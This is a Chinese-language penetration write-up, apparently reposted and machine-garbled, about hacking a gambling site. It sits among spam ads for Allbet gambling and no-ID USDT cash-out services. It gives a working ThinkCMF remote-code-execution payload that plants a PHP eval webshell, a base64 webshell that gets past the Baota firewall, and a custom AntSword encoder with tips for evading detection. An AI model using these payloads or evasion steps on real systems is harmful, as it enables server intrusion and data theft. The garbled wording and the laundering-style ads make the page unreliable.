欢迎进入Allbet官网www.aLLbetgame.us。Allbet官网开放Allbet登录网址、Allbet开户、Allbet代理开户、Allbet电脑客户端、Allbet手机版下载等业务。

首页科技正文

usdt跑分(www.caibao.it):记一次绕过宝塔防火墙的BC站渗透

admin2021-11-25338安全技术众测渗透

USDT第三方支付

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

0x00 信息网络
由于主站存在云waf 一测就封 且劈头测试不存在能用得上的洞 以是转战分站 希望能通太过站获得有价值的信息


这是一个查询署理帐号的站 url输入admin 自动跳转至后台


看这个参数 展望可能是thinkCMF

0x01 getshell

thinkcmf正好有一个RCE 可以实验一下

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test1.php','<?php @eval($_POST[zero])?>')</php>

白屏是个好兆头 应该是乐成了
接见一下

实验蚁剑毗邻 直接报错 展望可能遇到防火墙了

然后再回来看一下shell 手动实验一个phpinfo


果真存在宝塔防火墙

0x02 绕过宝塔防火墙
宝塔应该对部门函数举行了过滤,以是直接通报payload一定是不行的,以是我们需要对流量举行混淆加密。

实验将所有的payload Base64编码传输

既然传已往的是编码后的Base64,小马也应该响应做出改变,只需解密一次通报过来的base64即可。

小马如下:

<?php @eval(base64_decode($_POST[zero]));?>

将phpinfo();base64编码为 cGhwaW5mbygpOw==

发送

可见 宝塔防火墙没再阻挡 已经乐成绕过宝塔防火墙

0x03 刷新蚁剑

,

Usdt第三方支付接口

菜宝钱包(www.caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,

我们用到的是Base64编码,然则蚁剑着实是自带Base64编码解码器的 。

实验直接使用自带的Base64编码器

为什么会这样呢?

我们实验从蚁剑的流量剖析

设置署理到burp

阻挡流量

我们可以看到 显著有两个地方容易被waf识别

一是:User-Agent头的要害字:antSword/v2.1 这相当于直接告诉waf我是谁了, 以是这是第一个要更改的点

二是:蚁剑的流量着实照样有要害字的 好比cmd参数后的 eval base64_decode 都是,而且我们的小马自带Base64解密,以是用它的默认编码器不仅过不去waf 纵然没waf也不能正常毗邻我们的小马,以是需要自己界说编码器。

新建PHP编码器

由于我们只需要将payloadBase64编码一次即可,以是直接将data['_']Base64 处置赋值即可 随机参数有没有无所谓的

编码器如下

'use strict';

/*
* @param  {String} pwd   毗邻密码
* @param  {Array}  data  编码器处置前的 payload 数组
* @return {Array}  data  编码器处置后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {

  data[pwd] = Buffer.from(data['_']).toString('base64');

  delete data['_'];

  return data;
}

然后修改UA头

应用我们的编码器 解码器不需要指定 默认即可
建议选择 增添垃圾数据和Multipart发包

再次测试毗邻

然后点击目录 发现依然存在问题 不能跨目录 这个问题着实哥斯拉可以解决 上传哥斯拉马

这里可能有人会问了 那你直接上传哥斯拉马不就行了吗 现真相形是 get传参有长度限制 而且有的符号会导致截断php文件无法上传完整


网站有挺多 然则很惋惜没有主站 数据库里只有一堆署理帐号 虚耗时间了


网友评论

4条评论
  • 2021-08-09 00:01:08

    菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。无聊来看看。

最新评论